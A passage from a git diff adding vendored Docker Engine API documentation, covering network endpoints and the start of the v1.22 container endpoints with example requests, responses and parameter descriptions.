"02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + } + }, + { + "Name": "none", + "Id": "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794", + "Scope": "local", + "Driver": "null", + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + }, + { + "Name": "host", + "Id": "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e", + "Scope": "local", + "Driver": "host", + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + } +] +``` + +**Query parameters**: + +- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the networks list. Available filters: `name=[network-names]` , `id=[network-ids]` + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Inspect network + +`GET /networks/` + +**Example request**: + + GET /v1.21/networks/f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566 HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +{ + "Name": "bridge", + "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.0.0/16" + } + ] + }, + "Containers": { + "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": { + "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda", + "MacAddress": "02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + } +} +``` + +**Status codes**: + +- **200** - no error +- **404** - network not found + +#### Create a network + +`POST /networks/create` + +Create a network + +**Example request**: + +``` +POST /v1.21/networks/create HTTP/1.1 +Content-Type: application/json + +{ + "Name":"isolated_nw", + "CheckDuplicate":true, + "Driver":"bridge", + "IPAM":{ + "Driver": "default", + "Config":[ + { + "Subnet":"172.20.0.0/16", + "IPRange":"172.20.10.0/24", + "Gateway":"172.20.10.11" + } + ] + } +} +``` + +**Example response**: + +``` +HTTP/1.1 201 Created +Content-Type: application/json + +{ + "Id": "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30", + "Warning": "" +} +``` + +**Status codes**: + +- **201** - no error +- **404** - plugin not found +- **500** - server error + +**JSON parameters**: + +- **Name** - The new network's name. this is a mandatory field +- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false` +- **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver +- **IPAM** - Optional custom IP scheme for the network + - **Driver** - Name of the IPAM driver to use. Defaults to `default` driver + - **Config** - List of IPAM configuration options, specified as a map: + `{"Subnet": , "IPRange": , "Gateway": , "AuxAddress": }` +- **Options** - Network specific options to be used by the drivers + +#### Connect a container to a network + +`POST /networks/(id)/connect` + +Connect a container to a network + +**Example request**: + +``` +POST /v1.21/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4" +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - network or container is not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **container** - container-id/name to be connected to the network + +#### Disconnect a container from a network + +`POST /networks/(id)/disconnect` + +Disconnect a container from a network + +**Example request**: + +``` +POST /v1.21/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4" +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - network or container not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **Container** - container-id/name to be disconnected from a network + +#### Remove a network + +`DELETE /networks/(id)` + +Instruct the driver to remove the network (`id`). + +**Example request**: + + DELETE /v1.21/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - no such network +- **500** - server error + +## 3. Going further + +### 3.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. + +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 3.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + + +### 3.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all, +default or blank means CORS disabled + + $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar" diff --git a/vendor/github.com/docker/docker/docs/api/v1.22.md b/vendor/github.com/docker/docker/docs/api/v1.22.md new file mode 100644 index 0000000000..e94081344c --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/v1.22.md @@ -0,0 +1,3307 @@ +--- +title: "Engine API v1.22" +description: "API Documentation for Docker" +keywords: "API, Docker, rcli, REST, documentation" +redirect_from: +- /engine/reference/api/docker_remote_api_v1.22/ +- /reference/api/docker_remote_api_v1.22/ +--- + + + +## 1. Brief introduction + + - The daemon listens on `unix:///var/run/docker.sock` but you can + [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket). + - The API tends to be REST. However, for some complex commands, like `attach` + or `pull`, the HTTP connection is hijacked to transport `stdout`, + `stdin` and `stderr`. + +## 2. Endpoints + +### 2.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.22/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 1", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:02" + } + } + } + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 222222", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.8", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:08" + } + } + } + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.6", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:06" + } + } + } + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "d91c7b2f0644403d7ef3095985ea0e2370325cd2332ff3a3225c4247328e66e9", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.5", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:05" + } + } + } + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. + Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`created`|`restarting`|`running`|`paused`|`exited`|`dead`) + - `label=key` or `label="key=value"` of a container label + - `isolation=`(`default`|`process`|`hyperv`) (Windows daemon only) + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.22/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "StopSignal": "SIGTERM", + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Tmpfs": { "/run": "rw,noexec,nosuid,size=65536k" }, + "Links": ["redis3:redis"], + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + "BlkioWeight": 300, + "BlkioWeightDevice": [{}], + "BlkioDeviceReadBps": [{}], + "BlkioDeviceReadIOps": [{}], + "BlkioDeviceWriteBps": [{}], + "BlkioDeviceWriteIOps": [{}], + "MemorySwappiness": 60, + "OomKillDisable": false, + "OomScoreAdj": 500, + "PidMode": "", + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsOptions": [""], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "GroupAdd": ["newgroup"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "CgroupParent": "", + "VolumeDriver": "", + "ShmSize": 67108864 + }, + "NetworkingConfig": { + "EndpointsConfig": { + "isolated_nw" : { + "IPAMConfig": { + "IPv4Address":"172.20.30.33", + "IPv6Address":"2001:db8:abcd::3033" + }, + "Links":["container_1", "container_2"], + "Aliases":["server_x", "server_y"] + } + } + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id":"e90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. +- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. +- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- **Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. +- **WorkingDir** - A string specifying the working directory for commands to + run in. +- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **StopSignal** - Signal to stop a container as a string or unsigned integer. `SIGTERM` by default. +- **HostConfig** + - **Binds** – A list of volume bindings for this container. Each volume binding is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. Both `host-src`, and `container-dest` must be + an _absolute_ path. + + `volume-name:container-dest` to bind-mount a volume managed by a + volume driver into the container. `container-dest` must be an + _absolute_ path. + + `volume-name:container-dest:ro` to mount the volume read-only + inside the container. `container-dest` must be an _absolute_ path. + - **Tmpfs** – A map of container directories which should be replaced by tmpfs mounts, and their corresponding + mount options. A JSON object in the form `{ "/run": "rw,noexec,nosuid,size=65536k" }`. + - **Links** - A list of links for the container. Each link entry should be + in the form of `container_name:alias`. + - **Memory** - Memory limit in bytes. + - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap. + You must use this with `memory` and make the swap value larger than `memory`. + - **MemoryReservation** - Memory soft limit in bytes. + - **KernelMemory** - Kernel memory limit in bytes. + - **CpuShares** - An integer value containing the container's CPU Shares + (ie. the relative weight vs other containers). + - **CpuPeriod** - The length of a CPU period in microseconds. + - **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period. + - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use. + - **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + - **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000. + - **BlkioWeightDevice** - Block IO weight (relative device weight) in the form of: `"BlkioWeightDevice": [{"Path": "device_path", "Weight": weight}]` + - **BlkioDeviceReadBps** - Limit read rate (bytes per second) from a device in the form of: `"BlkioDeviceReadBps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceReadBps": [{"Path": "/dev/sda", "Rate": "1024"}]"` + - **BlkioDeviceWriteBps** - Limit write rate (bytes per second) to a device in the form of: `"BlkioDeviceWriteBps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceWriteBps": [{"Path": "/dev/sda", "Rate": "1024"}]"` + - **BlkioDeviceReadIOps** - Limit read rate (IO per second) from a device in the form of: `"BlkioDeviceReadIOps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceReadIOps": [{"Path": "/dev/sda", "Rate": "1000"}]` + - **BlkioDeviceWiiteIOps** - Limit write rate (IO per second) to a device in the form of: `"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceWriteIOps": [{"Path": "/dev/sda", "Rate": "1000"}]` + - **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. + - **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not. + - **OomScoreAdj** - An integer value containing the score given to the container in order to tune OOM killer preferences. + - **PidMode** - Set the PID (Process) Namespace mode for the container; + `"container:"`: joins another container's PID namespace + `"host"`: use the host's PID namespace inside the container + - **PortBindings** - A map of exposed container ports and the host port they + should map to. A JSON object in the form + `{ /: [{ "HostPort": "" }] }` + Take note that `port` is specified as a string and not an integer value. + - **PublishAllPorts** - Allocates a random host port for all of a container's + exposed ports. Specified as a boolean value. + - **Privileged** - Gives the container full access to the host. Specified as + a boolean value. + - **ReadonlyRootfs** - Mount the container's root filesystem as read only. + Specified as a boolean value. + - **Dns** - A list of DNS servers for the container to use. + - **DnsOptions** - A list of DNS options + - **DnsSearch** - A list of DNS search domains + - **ExtraHosts** - A list of hostnames/IP mappings to add to the + container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + - **VolumesFrom** - A list of volumes to inherit from another container. + Specified in the form `[:]` + - **CapAdd** - A list of kernel capabilities to add to the container. + - **Capdrop** - A list of kernel capabilities to drop from the container. + - **GroupAdd** - A list of additional groups that the container process will run as + - **RestartPolicy** – The behavior to apply when the container exits. The + value is an object with a `Name` property of either `"always"` to + always restart, `"unless-stopped"` to restart always except when + user has manually stopped the container or `"on-failure"` to restart only when the container + exit code is non-zero. If `on-failure` is used, `MaximumRetryCount` + controls the number of times to retry before giving up. + The default is not to restart. (optional) + An ever increasing delay (double the previous delay, starting at 100mS) + is added before each restart to prevent flooding the server. + - **NetworkMode** - Sets the networking mode for the container. Supported + standard values are: `bridge`, `host`, `none`, and `container:`. Any other value is taken + as a custom network's name to which this container should connect to. + - **Devices** - A list of devices to add to the container specified as a JSON object in the + form + `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}` + - **Ulimits** - A list of ulimits to set in the container, specified as + `{ "Name": , "Soft": , "Hard": }`, for example: + `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }` + - **SecurityOpt**: A list of string values to customize labels for MLS + systems, such as SELinux. + - **LogConfig** - Log configuration for the container, specified as a JSON object in the form + `{ "Type": "", "Config": {"key1": "val1"}}`. + Available types: `json-file`, `syslog`, `journald`, `gelf`, `awslogs`, `splunk`, `none`. + `json-file` logging driver. + - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist. + - **VolumeDriver** - Driver that this container users to mount volumes. + - **ShmSize** - Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB. + +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.22/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "StopSignal": "SIGTERM" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "BlkioWeight": 0, + "BlkioWeightDevice": [{}], + "BlkioDeviceReadBps": [{}], + "BlkioDeviceWriteBps": [{}], + "BlkioDeviceReadIOps": [{}], + "BlkioDeviceWriteIOps": [{}], + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpusetMems": "", + "CpuShares": 0, + "CpuPeriod": 100000, + "Devices": [], + "Dns": null, + "DnsOptions": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "OomKillDisable": false, + "OomScoreAdj": 500, + "NetworkMode": "bridge", + "PidMode": "", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": "on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "VolumesFrom": null, + "Ulimits": [{}], + "VolumeDriver": "", + "ShmSize": 67108864 + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "SandboxID": "", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": null, + "SandboxKey": "", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "", + "Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "", + "IPPrefixLen": 0, + "IPv6Gateway": "", + "MacAddress": "", + "Networks": { + "bridge": { + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:12:00:02" + } + } + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { + "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Dead": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z", + "Status": "running" + }, + "Mounts": [ + { + "Name": "fac362...80535", + "Source": "/data", + "Destination": "/data", + "Driver": "local", + "Mode": "ro,Z", + "RW": false, + "Propagation": "" + } + ] + } + +**Example request, with size information**: + + GET /v1.22/containers/4fa6e0f0c678/json?size=1 HTTP/1.1 + +**Example response, with size information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + .... + "SizeRw": 0, + "SizeRootFs": 972, + .... + } + +**Query parameters**: + +- **size** – 1/True/true or 0/False/false, return container size information. Default is `false`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + +`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. + +**Example request**: + + GET /v1.22/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.22/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ] + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ], + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.22/containers/4fa6e0f0c678/logs?stderr=1&stdout=1×tamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. +- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. +- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. +- **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp + will only output log-entries since that timestamp. Default: 0 (unfiltered) +- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.22/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.22/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. + +**Example request**: + + GET /v1.22/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "networks": { + "eth0": { + "rx_bytes": 5338, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 36, + "tx_bytes": 648, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 8 + }, + "eth5": { + "rx_bytes": 4641, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 26, + "tx_bytes": 690, + "tx_dropped": 0, + 